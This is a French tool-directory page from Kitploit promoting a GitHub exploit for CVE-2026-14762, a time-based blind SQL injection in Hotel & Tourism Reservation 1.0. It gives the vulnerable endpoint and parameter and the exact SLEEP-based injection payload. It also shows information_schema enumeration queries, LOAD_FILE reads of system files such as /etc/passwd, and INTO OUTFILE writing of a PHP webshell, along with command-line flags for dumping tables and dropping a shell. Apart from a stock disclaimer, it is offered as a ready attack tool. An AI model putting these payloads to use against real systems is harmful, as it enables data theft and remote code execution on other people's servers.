Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-14762-PoC-Exploit — Multithreadé exploit d'injection SQL aveugle basée sur le temps pour CVE-2026-14762 ciblant Hotel & Tourism Reservation 1.0. Énumère les bases de données, les tables, les colonnes ; lit les fichiers via LOAD_FILE ; écrit des webshells PHP pour exécution de code à distance (RCE). Prend en charge le proxy, le scan par lot et un shell SQL interactif. | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-14762-poc-exploit
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Sécurité des Bases de Données
GitHubtc4dy/cve-2026-14762-poc-exploit

CVE-2026-14762-PoC-Exploit

Voir le dépôt
212il y a 2 moisPas encore vérifié

À propos

Multithreadé exploit d'injection SQL aveugle basée sur le temps pour CVE-2026-14762 ciblant Hotel & Tourism Reservation 1.0. Énumère les bases de données, les tables, les colonnes ; lit les fichiers via LOAD_FILE ; écrit des webshells PHP pour exécution de code à distance (RCE). Prend en charge le proxy, le scan par lot et un shell SQL interactif.

Partager

CVE-2026-14762 – Exploitation d'injection SQL dans Code‑Projects Hotel & Tourism Reservation 1.0

Python 3.11+ License CVSS CWE

Exploit d'injection SQL aveugle basée sur le temps, multi‑threadé et complet pour CVE‑2026‑14762.
Cible le point de terminaison /admin/rooms.php de l'application Code‑Projects Hotel & Tourism Reservation (version 1.0).
Permet l'énumération complète de la base de données, la lecture du système de fichiers (LOAD_FILE), et l'écriture arbitraire de fichiers (INTO OUTFILE / ) – menant à l'exécution de code à distance via le déploiement d'un webshell.

DUMPFILE

CVE Exploit


🚀 Fonctionnalités

CatégorieCapacité
VulnérabilitéInjection SQL aveugle basée sur le temps (CWE‑89)
Vecteur d'attaqueGET /admin/rooms.php?delete=<payload>
ExploitationInjection conditionnelle SLEEP() avec extraction de caractères par recherche binaire
Base de donnéesExtraction du nom de la base de données courante
SchémaÉnumération des tables et colonnes via information_schema
Extraction de donnéesExport complet de table (JSON) – lignes illimitées, limite configurable
Lecture de fichierLOAD_FILE() – lire tout fichier lisible par MySQL (ex. /etc/passwd, fichiers de configuration)
Écriture de fichierINTO OUTFILE / DUMPFILE – écrire un webshell PHP, backdoor ou contenu arbitraire
Shell interactifShell SQL en direct (extraction basée sur le temps) pour des requêtes manuelles
Requête uniqueExécuter du SQL ad‑hoc et récupérer les résultats (limite de 512 caractères)
Mode batchScan multi‑cible avec pool de threads configurable (ThreadPoolExecutor)
Support proxyProxy HTTP/HTTPS (Burp Suite, mitmproxy, etc.)
Journalisation détailléeSortie colorée avec informations de débogage horodatées
Zéro dépendanceSeulement requests, urllib3, et colorama (optionnel)

📦 Prérequis

  • Python ≥ 3.11
  • Paquets Python :
    • requests
    • urllib3
    • colorama (optionnel – pour une sortie colorée dans le terminal)

Installez toutes les dépendances avec :

root@kitploit:~
pip install requests urllib3 colorama

📖 Utilisation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-14762-PoC-Exploit.git

cd CVE-2026-14762-PoC-Exploit

chmod +x exploit.py or basic_exploit.py

📖 Arguments en ligne de commande

ArgumentCourtTypeDéfautDescription
--target-tURL—URL cible unique (ex. http://192.168.1.100)
--target-file-lFile—Fichier contenant la liste des cibles (une par ligne)
--threads—Int5Nombre de threads pour le scan multi-cible
--output-oPath—Fichier de sortie (JSON pour les extractions, texte brut pour les fichiers)
--verbose-vFlagFalseActiver la journalisation de débogage détaillée
--proxy—URL—Proxy HTTP/HTTPS (ex. http://127.0.0.1:8080)
--user-agent-uaStringMozilla/5.0...En-tête User-Agent personnalisé
--delay—Float5.0Temps de pause en secondes pour l'injection aveugle
--max-retries—Int3Nombre maximum de tentatives de requête

⚙️ Comment ça fonctionne

Construction de la charge utile

Le paramètre delete est injecté avec :

root@kitploit:~
150' AND IF(<condition>, SLEEP(<delay>), 0) AND '1'='1

La fonction IF() évalue la condition ; si vraie, la base de données dort pendant secondes.

Extraction de caractères par recherche binaire

Pour chaque position de caractère, une recherche binaire sur la plage ASCII (32–126) détermine le caractère correct en utilisant les comparaisons > et =. Cela réduit les requêtes de 95 par caractère à ~7–8, rendant l'extraction très efficace.

Énumération des métadonnées

root@kitploit:~
Nom de la base de données : SELECT DATABASE()

Tables : SELECT table_name FROM information_schema.tables WHERE table_schema='<db>' LIMIT n,1

Colonnes : SELECT column_name FROM information_schema.columns WHERE table_schema='<db>' AND table_name='<table>' LIMIT n,1

Exfiltration de données

root@kitploit:~
SELECT <col> FROM <table> LIMIT row,1 – extrait ligne par ligne

Chaque cellule est extraite caractère par caractère en utilisant la même technique de recherche binaire

Interaction avec le système de fichiers

root@kitploit:~
Lecture : LOAD_FILE('/path/to/file') – nécessite que secure_file_priv soit vide ou pointe vers le répertoire cible

Écriture : SELECT '<content>' INTO OUTFILE '/path/to/shell.php' – nécessite le privilège FILE et que secure_file_priv ne soit pas restrictif

🛡️ Avertissement

Cet outil est fourni uniquement pour les tests de sécurité autorisés, la recherche pédagogique et l'évaluation des vulnérabilités.
L'auteur n'est pas responsable de toute utilisation abusive, activités illégales ou dommages causés par ce logiciel.
Obtenez toujours une autorisation écrite explicite du propriétaire du système avant de tester.

Télécharger l’outil
--ssl-verify
—
Flag
False
Activer la vérification du certificat SSL
--webroot—Path/var/www/htmlRacine web pour les écritures de webshell via INTO OUTFILE
--dump-db—FlagFalseExtraire toutes les tables de la base de données courante
--tables—FlagFalseLister uniquement les noms de toutes les tables
--dump-table—Table—Extraire une table spécifique (ex. --dump-table users)
--read—Path—Lire un fichier via LOAD_FILE()
--write-shell—FlagFalseÉcrire un webshell PHP (shell.php) dans la racine web
--sql—Query—Exécuter une seule requête SQL (retourne 512 caractères max)
--interactive-iFlagFalseLancer un shell SQL interactif après l'exploitation